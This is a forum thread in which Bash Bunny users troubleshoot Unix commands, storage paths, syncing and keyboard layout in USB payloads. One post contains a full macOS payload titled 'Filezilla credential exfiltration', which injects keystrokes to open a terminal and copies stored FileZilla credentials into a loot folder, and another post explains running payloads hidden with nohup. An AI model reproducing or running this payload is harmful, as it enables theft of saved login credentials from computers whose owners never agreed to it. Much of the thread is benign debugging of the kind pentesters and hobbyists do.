quentin_lamamy Posted July 23, 2017 Share Posted July 23, 2017 (edited) Hi there, I have a little question, i love my bash bunny, create a lot of payloads (i will post them when really finished), but still have some question. Actually for all my payload i open a terminal, minimize it and do my stuff. When i look at this kind of payload , on line 24 there is a unix command "mkdir". So, it's possible to use unix command without a terminal ? Reminder for people who read this topic, working unix command in payload : mkdir source export Edited July 26, 2017 by quentin.lamamy Quote Link to comment Share on other sites More sharing options...
PoSHMagiC0de Posted July 23, 2017 Share Posted July 23, 2017 Nope. That is making the folders on the local BB to gather the loot in. Quote Link to comment Share on other sites More sharing options...
quentin_lamamy Posted July 24, 2017 Author Share Posted July 24, 2017 but it's a nix command ? It's a custom function interpreted by the BB to create folder only on the BB ? If yes, it's not a good choice to keep the same function name Quote Link to comment Share on other sites More sharing options...
Dave-ee Jones Posted July 24, 2017 Share Posted July 24, 2017 Yes, many *Unix commands are supported by the Bash Bunny because it is a Linux box. mkdir chmod mv cd man rmdir rm There are lots.. Quote Link to comment Share on other sites More sharing options...
quentin_lamamy Posted July 24, 2017 Author Share Posted July 24, 2017 10 minutes ago, Dave-ee Jones said: Yes, many *Unix commands are supported by the Bash Bunny because it is a Linux box. mkdir chmod mv cd man rmdir rm There are lots.. There is a list somewhere ? I can't find this information on the wiki Quote Link to comment Share on other sites More sharing options...
Dave-ee Jones Posted July 24, 2017 Share Posted July 24, 2017 1 hour ago, quentin.lamamy said: There is a list somewhere ? I can't find this information on the wiki That's because it's not on the Wiki. Think about it - the Bash Bunny is a Linux computer in a USB, therefore it uses bash/sh, meaning any bash/sh commands will work (well, most of them, at least). Therefore just Google stuff like this.. Quote Link to comment Share on other sites More sharing options...
quentin_lamamy Posted July 24, 2017 Author Share Posted July 24, 2017 Thks for the tutorial... and the respect..... I'm not aware of the internal software and hardware of the BB. Just tell me that bb is a linux computer in a USB key, it's enough , i don't need help to know the command list available on unix, and i don't need your disdain. Quote Link to comment Share on other sites More sharing options...
Dave-ee Jones Posted July 24, 2017 Share Posted July 24, 2017 (edited) 56 minutes ago, quentin.lamamy said: Thks for the tutorial... and the respect..... I'm not aware of the internal software and hardware of the BB. Just tell me that bb is a linux computer in a USB key, it's enough , i don't need help to know the command list available on unix, and i don't need your disdain. I wasn't disrespecting you, sorry if it seemed that way. You asked for a command list after I stated that the BB was a Linux box on a stick, so I just helped point you in the right direction - Google a list of commands. :) Hope it helped in the end. While I said that you can find a list of commands, I also said that some may not work (most will work), so the best way to find out is to test them. Obviously don't do commands that may brick your Bunny or break something.. Edited July 24, 2017 by Dave-ee Jones Quote Link to comment Share on other sites More sharing options...
quentin_lamamy Posted July 24, 2017 Author Share Posted July 24, 2017 (edited) Ok, hoist the white flag xD I just try try this command mkdir -p /root/udisk/loot/exfiltration nothing, no folder, a total void ^^ but if i use this command Q STRING mkdir -p /Volumes/BashBunny/loot/exfiltration Q ENTER it work's \o/ for me it's the same, i just want to understand where is my mistake. Thks Edited July 24, 2017 by quentin.lamamy Quote Link to comment Share on other sites More sharing options...
Dave-ee Jones Posted July 24, 2017 Share Posted July 24, 2017 (edited) Where are you posting the Ducky script? In your SSH/Serial shell for the Bunny or..? In regards to your first try, "/root/udisk" doesn't actually refer to your USB storage while in Arming mode. However, if you decided to write a payload that did this.. LED Y # Make LED yellow to start mkdir -p "/root/udisk/loot/exfiltration" # Makes the directory if [ -d "/root/udisk/loot/exfiltration" ] # Checks for the directory then LED G # If the directory exists turn the LED green fi And then went back into Arming mode, you will notice the folder is there. Also, the LED should have gone green during the payload too. Also, your code did work however you just can't see the directory in the USB storage. If you check for that directory (or even 'cd' to it) in the serial console where you called it you will notice it actually does exist. It's a bit weird how it works - you just have to think of USB storage and 'udisk' as 2 different things. You can use the "udisk mount" and "sync" commands to sync the 'udisk' and USB storage. EDIT: I did the same thing you did (created the directory in the serial console), then rebooted my Bunny and the folder was there in USB storage. I would say you need to sync it before you try and access it on USB storage. Edited July 24, 2017 by Dave-ee Jones Quote Link to comment Share on other sites More sharing options...
quentin_lamamy Posted July 24, 2017 Author Share Posted July 24, 2017 (edited) 20 minutes ago, Dave-ee Jones said: Where are you posting the Ducky script? In your SSH/Serial shell for the Bunny or..? it's just in my switch1 folder like any other payload (not in serial console) And i test this weird path because i see it in this payload (when i don't have enough documentation or data, i try to learn from the existing script). But it seems that it's not the good way to create a folder (before moving file inside during exfiltration) Edited July 24, 2017 by quentin.lamamy Quote Link to comment Share on other sites More sharing options...
Dave-ee Jones Posted July 24, 2017 Share Posted July 24, 2017 1 minute ago, quentin.lamamy said: it's just in my switch1 folder like any other payload (not in serial console) And i test this weird path because i see it in this payload (when i don't have enough documentation or data, i try to learn from the existing script). But it seems that it's not the good way to create a folder (before moving file inside during exfiltration) Aha, that's how everyone learns :P But did it work for you? You may have to play around a bit for it to update live in Windows Explorer, but using it in a payload works fine. E.g. I can create a folder using "mkdir -p" and put/get files from it as I need, it just doesn't show the folder in Windows Explorer initially - you would have to sync it and "udisk mount" (don't quote me on the mounting part - I'm not actually sure how that works, I did once upon a time when I needed to use it for a payload but now I've forgotten). Quote Link to comment Share on other sites More sharing options...
PoSHMagiC0de Posted July 24, 2017 Share Posted July 24, 2017 I spent all weekend looking through those payloads figuring out which one I should update. I got overwhelmed. Going to just need people to suggest which one needs looking over the most and start there. Summary. The BB is a Arm machine running linux. It has its root partition that it boots from and a nang (i think it is called that) that is usually mapped as udisk for payloads and exfiltrated data. If you make a payload with just a network connection you can ssh into it and explore it. The BB comes with some helpers for you. Like in the shell it has the udisk command to mount and format the partition that is mounted and payloads are ran from. For the payloads themselves there are helper functions to get you ip address of the bunny and clients, switch position, and hostnames. The wiki has their uses. I looked in the past for a way to run my payloads hidden in linux and found a way but it works best when the payload is encompassed into a script ie python, perl, bash, whatever. The key here is the nohup command in linux. I do not know if it is there in MacOS but I always seen it in linux. If I use it like so against my payload script it will be. nohup bash ./myscript.sh & exit nohup keeps your script from closing when you close the terminal. Of course you can only see the process in "top", if it is still running. It also writes all output to a nohup.not file. I have foudn that while prethinking of a way to make an agent run hidden on linux since I had no takers on writing the python agent for the BBTPS for linux and OSX, I am going to have to do it as soon as I figure out how to run a separate process from python detached from the current python instance (like start-process in powershell for windows). Quote Link to comment Share on other sites More sharing options...
quentin_lamamy Posted July 24, 2017 Author Share Posted July 24, 2017 well... thks but what is the link with the question ? ^^ Quote Link to comment Share on other sites More sharing options...
Dave-ee Jones Posted July 24, 2017 Share Posted July 24, 2017 6 hours ago, PoSHMagiC0de said: I spent all weekend looking through those payloads figuring out which one I should update. I got overwhelmed. Going to just need people to suggest which one needs looking over the most and start there. Summary. The BB is a Arm machine running linux. It has its root partition that it boots from and a nang (i think it is called that) that is usually mapped as udisk for payloads and exfiltrated data. If you make a payload with just a network connection you can ssh into it and explore it. The BB comes with some helpers for you. Like in the shell it has the udisk command to mount and format the partition that is mounted and payloads are ran from. For the payloads themselves there are helper functions to get you ip address of the bunny and clients, switch position, and hostnames. The wiki has their uses. I looked in the past for a way to run my payloads hidden in linux and found a way but it works best when the payload is encompassed into a script ie python, perl, bash, whatever. The key here is the nohup command in linux. I do not know if it is there in MacOS but I always seen it in linux. If I use it like so against my payload script it will be. nohup bash ./myscript.sh & exit nohup keeps your script from closing when you close the terminal. Of course you can only see the process in "top", if it is still running. It also writes all output to a nohup.not file. I have foudn that while prethinking of a way to make an agent run hidden on linux since I had no takers on writing the python agent for the BBTPS for linux and OSX, I am going to have to do it as soon as I figure out how to run a separate process from python detached from the current python instance (like start-process in powershell for windows). That doesn't sound like it has anything to do with this guy's question.. 1 Quote Link to comment Share on other sites More sharing options...
quentin_lamamy Posted July 24, 2017 Author Share Posted July 24, 2017 Here is the result of some test TEST 1 : Print the command in shell and press enter rootDir=/Volumes/BashBunny lootDir=$rootDir/loot/exfiltration/ [...] Q STRING mkdir -p $lootDir Q ENTER The result : No folder creation and this result in the console bashbunny> mkdir §p /Volumes/BashBunny/loot/exfiltration/ mkdir: §p: File exists Why this error ? Don't know because the file doesn't exist, And why my mkdir -p become mkdir: §p ? Quote Link to comment Share on other sites More sharing options...
Dave-ee Jones Posted July 25, 2017 Share Posted July 25, 2017 (edited) Okay, your keyboard language and Bunny language need to be the same. So whatever you use (us, fr, etc.) needs to be set on both systems. Using the command: DUCKY_LANG us should fix the Bunny up. Just set the Bunny's language to whatever the PC's language is. There's a list of supported languages in the 'language' folder on the Bunny's USB storage. Now, in regards to the "folder exists" error, in means the folder exists ( :P ). The USB storage may not show it, but on the Bunny it exists. Why are you using Ducky script to write the command? What are you writing the command into? Did you try my quick payload to see if it is working? 18 hours ago, Dave-ee Jones said: LED Y # Make LED yellow to start mkdir -p "/root/udisk/loot/exfiltration" # Makes the directory if [ -d "/root/udisk/loot/exfiltration" ] # Checks for the directory then LED G # If the directory exists turn the LED green fi Edited July 25, 2017 by Dave-ee Jones Quote Link to comment Share on other sites More sharing options...
quentin_lamamy Posted July 25, 2017 Author Share Posted July 25, 2017 Yes here is my complete payload hearder LED SETUP rootDir=/Volumes/BashBunny lootDir=$rootDir/loot/exfiltration/ DUCKY_LANG fr GET SWITCH_POSITION ATTACKMODE HID STORAGE Quote Link to comment Share on other sites More sharing options...
Dave-ee Jones Posted July 25, 2017 Share Posted July 25, 2017 (edited) You can see all the files on USB storage when you do this in the serial console: udisk mount # unlocks USB storage in console cd /root/udisk/ # go to the USB storage ls # lists all the files/folders in the current directory Just tested that, works good. From there you can "mkdir" and stuff, then call "sync" at the end and everything updates fine, after you've rebooted. You may also notice that everything works fine in a normal payload, you wouldn't normally have to do a udisk mount and a sync everytime. You can write to a file in the loot directory and once the payload has completed, just call "sync" and once the payload has finished go back to arming mode and your exfiltration stuff is sitting right there. Edited July 25, 2017 by Dave-ee Jones Quote Link to comment Share on other sites More sharing options...
quentin_lamamy Posted July 25, 2017 Author Share Posted July 25, 2017 (edited) Just try and yes tadaa i have my folder, but in my case it don't work ? #!/bin/bash ############################################################################### # _____ _____ _____ _____ _____ _____ _____ _____ __ __ # # (\___/) | __ || _ || __|| | | | __ || | || | || | || | | # # (='.'=) | __ -|| ||__ || | | __ -|| | || | | || | | ||_ _| # # (")_(") |_____||__|__||_____||__|__| |_____||_____||_|___||_|___| |_| # # Bash Bunny by Hak5 USB Attack/Automation Platform # # # ############################################################################### # # # Title: Filezilla credential exfiltration # # Author: Quentin Lamamy <contact@quentin-lamamy.fr> # # Description Exfiltrate filezilla credential # # Version: 1.0 # # Platform OSX # # # ############################################################################### ##################### # Setup the payload # ##################### LED SETUP rootDir=/Volumes/BashBunny lootDir=$rootDir/loot/exfiltration/filezilla DUCKY_LANG fr GET SWITCH_POSITION ATTACKMODE HID STORAGE ##################### # Attack the target # ##################### LED ATTACK Q CTRL SPACE Q STRING terminal Q ENTER Q STRING source $rootDir/payloads/$SWITCH_POSITION/shell.sh Q ENTER Q STRING shell.init Q ENTER Q STRING mkdir -p $lootDir Q ENTER Q STRING source $rootDir/payloads/$SWITCH_POSITION/filezillaExfiltration.sh; Q ENTER Q STRING filezilla.exfiltration $lootDir Q ENTER #Q STRING clear #Q ENTER QUACK STRING source $rootDir/payloads/$SWITCH_POSITION/footer.sh QUACK ENTER # Close terminal #QUACK STRING killall Terminal #QUACK ENTER LED FINISH ################################################################################# # (\___/) Find further documentation, repository of payloads, (\___/) # # (='.'=) tutorial videos and community support forums at (='.'=) # # (")_(") bashbunny.com. (C) Hak5 LLC (")_(") # ################################################################################# cp: /Volumes/BashBunny/loot/exfiltration/filezilla/quentin_sitemanager.xml: No such file or directory It's not the better way to do QUACK mkdir ..... and QUACK ENTER, but it should work no ? Edited July 25, 2017 by quentin.lamamy Quote Link to comment Share on other sites More sharing options...
Dave-ee Jones Posted July 25, 2017 Share Posted July 25, 2017 (edited) I don't understand why you are Ducky scripting your "mkdir", you don't need to. The Bash Bunny is a Linux box, therefore saying mkdir -p $lootDir says "Make a directory in this folder called this: 'exfiltration'". However, doing it like you are doing it Q STRING mkdir -p $lootDir is just writing that in a selected textbox. So unless the selected textbox is a SSH/Serial console in the Bunny this isn't going to work. So it is in a Terminal, therefore this COULD work however you must remember that any command you make is being executed on your PC, not the Bunny. I don't have a Mac so I can't test this or see anything that may be wrong with your Terminal stuff. No where does it show Quentin_Sitemanager.xml being created so I am assuming that is in one of your *.sh files? You should look at those. Also, check to make sure that filezillaExfiltration.sh is actually being run - sourcing it might run it and then calling it might run it again. The second time you've called it it might not run correctly because it has to be executable. You should make the *.sh files log to another file, giving you regular updates of what is happening. Edited July 25, 2017 by Dave-ee Jones Quote Link to comment Share on other sites More sharing options...
quentin_lamamy Posted July 25, 2017 Author Share Posted July 25, 2017 Yes, i know it sucks to do this way, now i use /root/udisk. At the moment i have tested 2 unix command that works, mkdir and source Quote Link to comment Share on other sites More sharing options...
Dave-ee Jones Posted July 25, 2017 Share Posted July 25, 2017 Okay, that's good news. You might notice you can do other things like for loops, while loops, switches, etc. Normal Bash programming stuff :P Quote Link to comment Share on other sites More sharing options...
quentin_lamamy Posted July 26, 2017 Author Share Posted July 26, 2017 (edited) 21 hours ago, Dave-ee Jones said: Okay, that's good news. You might notice you can do other things like for loops, while loops, switches, etc. Normal Bash programming stuff :P Yes all this classic command will work, i try all the "uncommon" command and try them to help the future BB noob like me Next unix command test : export export FOO="BAR" Q STRING $FOO # Will print, as expected BAR in the current focused window export PS1="bashbunny>" # Will do nothing I have little idea on why it don't change my terminal prompt, it may be a kind of scope issue. Something like the var is set for the actual running script on the BB and not for the current opened terminal. I use to success to make this work with Q STRING en Q ENTER, but now it sucks with some encoding issue # Print this command in terminal in order to be in the "good scope" Q STRING "export PS1='bashbunny >'" Q ENTER but the unexpected result is export PS1-'bashbunny #' encoding PB solve with a new OSX keyboard layout Edited July 26, 2017 by quentin.lamamy Quote Link to comment Share on other sites More sharing options...
PoSHMagiC0de Posted July 26, 2017 Share Posted July 26, 2017 So...you don't want to run unix commands without a terminal? Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.